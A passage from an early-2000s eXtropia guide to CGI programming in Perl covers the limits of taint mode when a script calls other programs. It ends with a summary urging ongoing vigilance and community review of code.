Thus, you might think you are securely calling one program, but if that program in turn calls many other programs, you should be aware of how it is doing it. For example, not everyone else's Perl scripts you might call will use taint mode. And not everyone writes in Perl, so taint mode may not even be available to them as a tool. Always consider the entire path that your variable will take when you pass it along to another program.

[ TOC ]

Taint Mode Summary

Has all of this given you a headache yet? To some degree it should. Security is serious business. At least take solace in the fact that many people are like us, mere mortals. It does not take a security genius to look at every CGI script to make sure it is secure.

Rather, it takes some amount of vigilance on your part and also on the part of everyone else using your source code to make sure your programs are secure. It's not a matter of a one time security check either. New exploits are published all the time, and subsequently new fixes are published all the time.

To some degree publishing your code for securing programs is the best thing you can do to help ensure safe CGI. The more you use objects that have been checked over by a community of programmers, the more you can rely on the program being bug free including security bugs. [ TOC ]

[ TOC ]

[ TOC ]
Master Copy URL: /support/docs/adt/
Copyright © 2000-2001 Extropia. All rights reserved.
[ TOC ]
Written by eXtropia.
Last Modified at 09/20/2001